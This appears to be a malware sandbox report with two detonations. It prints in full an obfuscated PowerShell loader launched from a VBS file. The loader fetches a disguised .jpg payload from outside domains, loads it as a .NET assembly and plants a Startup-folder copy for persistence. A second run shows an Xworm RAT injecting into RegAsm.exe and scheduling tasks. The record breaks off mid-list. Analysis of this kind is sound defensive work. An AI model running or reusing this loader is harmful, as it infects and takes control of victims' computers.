SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2280-10-0x00007FFDD7DA0000-0x00007FFDD8861000-memory.dmp

memory/2280-11-0x00000174CF850000-0x00000174CF860000-memory.dmp

memory/2280-12-0x00000174CF850000-0x00000174CF860000-memory.dmp

memory/2280-13-0x00000174CF850000-0x00000174CF860000-memory.dmp

memory/2280-14-0x00007FFDD7DA0000-0x00007FFDD8861000-memory.dmp

memory/2280-15-0x00000174CF850000-0x00000174CF860000-memory.dmp

memory/2280-16-0x00000174CF850000-0x00000174CF860000-memory.dmp

Analysis: behavioral26

Detonation Overview

Submitted

2024-04-19 07:49

Reported

2024-04-19 07:52

Platform

win10v2004-20240412-en

Max time kernel

149s

Max time network

155s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\windows_update\windows.vbs"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4092317236-2027488869-1227795436-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Adobe.vbs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Adobe.vbs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\windows_update\windows.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreJDgTreB3DgTreGUDgTreYgBDDgTreGwDgTreaQBlDgTreG4DgTredDgTreDgTregDgTreD0DgTreIDgTreBODgTreGUDgTredwDgTretDgTreE8DgTreYgBqDgTreGUDgTreYwB0DgTreCDgTreDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBODgTreGUDgTredDgTreDgTreuDgTreFcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreDsDgTreIDgTreDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCDgTreDgTrePQDgTregDgTreEcDgTreZQB0DgTreC0DgTreUgBhDgTreG4DgTreZDgTreBvDgTreG0DgTreIDgTreDgTretDgTreEkDgTrebgBwDgTreHUDgTredDgTreBPDgTreGIDgTreagBlDgTreGMDgTredDgTreDgTregDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCDgTreDgTreLQBDDgTreG8DgTredQBuDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTreuDgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreDsDgTreIDgTreDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreDgTre0DgTreCgDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreByDgTreGUDgTredDgTreB1DgTreHIDgTrebgDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTregDgTreH0DgTreOwDgTregDgTreDgTre0DgTreCgDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTrebgBhDgTreG4DgTrebwBzDgTreGgDgTreaQBlDgTreGwDgTreZDgTreDgTreuDgTreHDgTreDgTrecgBvDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreMgDgTreuDgTreGoDgTrecDgTreBnDgTreD8DgTreMQDgTre2DgTreDYDgTreMQDgTre1DgTreDQDgTreNwDgTreyDgTreDUDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTrebgBhDgTreG4DgTrebwBzDgTreGgDgTreZDgTreDgTreuDgTreHDgTreDgTrecgBvDgTreC8DgTreZgBpDgTreGwDgTreZQBzDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNDgTreDgTre0DgTreDQDgTreMQDgTre3DgTreDIDgTreMwDgTrenDgTreCkDgTreOwDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreDgTre0DgTreCgDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTreLQBuDgTreGUDgTreIDgTreDgTrekDgTreG4DgTredQBsDgTreGwDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBUDgTreGUDgTreeDgTreB0DgTreC4DgTreRQBuDgTreGMDgTrebwBkDgTreGkDgTrebgBnDgTreF0DgTreOgDgTre6DgTreFUDgTreVDgTreBGDgTreDgDgTreLgBHDgTreGUDgTredDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreDQDgTreKDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreFMDgTreVDgTreBBDgTreFIDgTreVDgTreDgTre+DgTreD4DgTreJwDgTre7DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCDgTreDgTrePQDgTregDgTreCcDgTrePDgTreDgTre8DgTreEIDgTreQQBTDgTreEUDgTreNgDgTre0DgTreF8DgTreRQBODgTreEQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreSQBuDgTreGQDgTreZQB4DgTreE8DgTreZgDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreKQDgTre7DgTreCDgTreDgTreDQDgTreKDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreBpDgTreGYDgTreIDgTreDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwBlDgTreCDgTreDgTreMDgTreDgTregDgTreC0DgTreYQBuDgTreGQDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwB0DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreKwDgTre9DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTreuDgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreDsDgTreIDgTreDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreOwDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTrekDgTreGMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBDDgTreG8DgTrebgB2DgTreGUDgTrecgB0DgTreF0DgTreOgDgTre6DgTreEYDgTrecgBvDgTreG0DgTreQgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreUwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFIDgTreZQBmDgTreGwDgTreZQBjDgTreHQDgTreaQBvDgTreG4DgTreLgBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreXQDgTre6DgTreDoDgTreTDgTreBvDgTreGEDgTreZDgTreDgTreoDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreKQDgTre7DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreCDgTreDgTrePQDgTregDgTreCQDgTrebDgTreBvDgTreGEDgTreZDgTreBlDgTreGQDgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreC4DgTreRwBlDgTreHQDgTreVDgTreB5DgTreHDgTreDgTreZQDgTreoDgTreCcDgTredDgTreBlDgTreHMDgTredDgTreBwDgTreG8DgTredwBlDgTreHIDgTrecwBoDgTreGUDgTrebDgTreBsDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreJDgTreBtDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreLgBHDgTreGUDgTredDgTreBNDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTreoDgTreCcDgTrebDgTreBhDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreHQDgTreeDgTreB0DgTreC4DgTreQQBjDgTreGQDgTreZDgTreBnDgTreG8DgTreaQDgTrevDgTreHMDgTreZQBsDgTreGkDgTreZgDgTrevDgTreG8DgTrecgBwDgTreC4DgTreZDgTreBsDgTreGUDgTreaQBoDgTreHMDgTrebwBuDgTreGEDgTrebgDgTrevDgTreC8DgTreOgBzDgTreHDgTreDgTredDgTreB0DgTreGgDgTreJwDgTresDgTreCDgTreDgTreJwDgTrexDgTreCcDgTreLDgTreDgTregDgTreCcDgTreQQBkDgTreG8DgTreYgBlDgTreCcDgTreKQDgTrepDgTreH0DgTrefQDgTre=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://nanoshield.pro/new_image2.jpg?166154725', 'https://nanoshd.pro/files/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.Acddgoi/selif/orp.dleihsonan//:sptth', '1', 'Adobe'))}}"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Adobe.vbs'"

Network

Country Destination Domain Proto
US 8.8.8.8:53 72.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 241.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 21.114.53.23.in-addr.arpa udp
US 8.8.8.8:53 58.99.105.20.in-addr.arpa udp
US 8.8.8.8:53 nanoshd.pro udp
US 8.8.8.8:53 nanoshield.pro udp
US 172.67.203.108:443 nanoshield.pro tcp
US 8.8.8.8:53 108.203.67.172.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 24.139.73.23.in-addr.arpa udp
US 23.53.113.159:80 tcp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 92.16.208.104.in-addr.arpa udp

Files

memory/2116-0-0x00000230643E0000-0x0000023064402000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_omfb5zsh.ke4.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2116-10-0x00007FFC5ACB0000-0x00007FFC5B771000-memory.dmp

memory/2116-12-0x0000023062230000-0x0000023062240000-memory.dmp

memory/2116-11-0x0000023062230000-0x0000023062240000-memory.dmp

memory/1464-13-0x00007FFC5ACB0000-0x00007FFC5B771000-memory.dmp

memory/1464-23-0x0000018E8C5E0000-0x0000018E8C5F0000-memory.dmp

memory/1464-24-0x0000018E8C5E0000-0x0000018E8C5F0000-memory.dmp

memory/1464-25-0x0000018E8C5E0000-0x0000018E8C5F0000-memory.dmp

memory/1464-26-0x0000018E8C570000-0x0000018E8C5BE000-memory.dmp

memory/3596-32-0x00007FFC5ACB0000-0x00007FFC5B771000-memory.dmp

memory/3596-37-0x00000252F6B00000-0x00000252F6B10000-memory.dmp

memory/3596-38-0x00000252F6B00000-0x00000252F6B10000-memory.dmp

memory/3596-45-0x00007FFC5ACB0000-0x00007FFC5B771000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 48874fdc03476cb442d506f5bb796f70
SHA1 2dedcc271d935fe842f7cb4cc03873b6f688d29d
SHA256 15717634eff02490a9e8a4606a3cc8d61876a9efa01b42d6c8bf442bcf8718e0
SHA512 31b5539304c0ad1f781407a60ff019c30192b2fe3e7bd64bf7dc3d5a9263eae6874c8ef960998900d1322d358e38f9eadba40945958fb6ff7719cd1a24644671

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 6cf293cb4d80be23433eecf74ddb5503
SHA1 24fe4752df102c2ef492954d6b046cb5512ad408
SHA256 b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA512 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

memory/1464-49-0x00007FFC5ACB0000-0x00007FFC5B771000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5caad758326454b5788ec35315c4c304
SHA1 3aef8dba8042662a7fcf97e51047dc636b4d4724
SHA256 83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391
SHA512 4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

memory/2116-52-0x00007FFC5ACB0000-0x00007FFC5B771000-memory.dmp

Analysis: behavioral5

Detonation Overview

Submitted

2024-04-19 07:49

Reported

2024-04-19 07:52

Platform

win7-20240221-en

Max time kernel

122s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\fresh.exe"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Xworm

trojan rat xworm

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2972 set thread context of 2984 N/A C:\Users\Admin\AppData\Local\Temp\fresh.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2972 wrote to memory of 2984 N/A C:\Users\Admin\AppData\Local\Temp\fresh.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2972 wrote to memory of 2984 N/A C:\Users\Admin\AppData\Local\Temp\fresh.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2972 wrote to memory of 2984 N/A C:\Users\Admin\AppData\Local\Temp\fresh.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2972 wrote to memory of 2984 N/A C:\Users\Admin\AppData\Local\Temp\fresh.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2972 wrote to memory of 2984 N/A C:\Users\Admin\AppData\Local\Temp\fresh.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2972 wrote to memory of 2984 N/A C:\Users\Admin\AppData\Local\Temp\fresh.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2972 wrote to memory of 2984 N/A C:\Users\Admin\AppData\Local\Temp\fresh.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2972 wrote to memory of 2984 N/A C:\Users\Admin\AppData\Local\Temp\fresh.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2972 wrote to memory of 2984 N/A C:\Users\Admin\AppData\Local\Temp\fresh.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2972 wrote to memory of 2984 N/A C:\Users\Admin\AppData\Local\Temp\fresh.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2972 wrote to memory of 2984 N/A C:\Users\Admin\AppData\Local\Temp\fresh.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2972 wrote to memory of 2984 N/A C:\Users\Admin\AppData\Local\Temp\fresh.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2972 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\fresh.exe C:\Windows\SysWOW64\cmd.exe
PID 2972 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\fresh.exe C:\Windows\SysWOW64\cmd.exe
PID 2972 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\fresh.exe C:\Windows\SysWOW64\cmd.exe
PID 2972 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\fresh.exe C:\Windows\SysWOW64\cmd.exe
PID 2972 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\fresh.exe C:\Windows\SysWOW64\cmd.exe
PID 2972 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\fresh.exe C:\Windows\SysWOW64\cmd.exe
PID 2972 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\fresh.exe C:\Windows\SysWOW64\cmd.exe
PID 2972 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\fresh.exe C:\Windows\SysWOW64\cmd.exe
PID 2652 wrote to memory of 2588 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2652 wrote to memory of 2588 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2652 wrote to memory of 2588 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2652 wrote to memory of 2588 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2972 wrote to memory of 2560 N/A C:\Users\Admin\AppData\Local\Temp\fresh.exe C:\Windows\SysWOW64\cmd.exe
PID 2972 wrote to memory of 2560 N/A C:\Users\Admin\AppData\Local\Temp\fresh.exe C:\Windows\SysWOW64\cmd.exe
PID 2972 wrote to memory of 2560 N/A C:\Users\Admin\AppData\Local\Temp\fresh.exe C:\Windows\SysWOW64\cmd.exe
PID 2972 wrote to memory of 2560 N/A C:\Users\Admin\AppData\Local\Temp\fresh.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\fresh.exe

"C:\Users\Admin\AppData\Local\Temp\fresh.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\cmd.exe

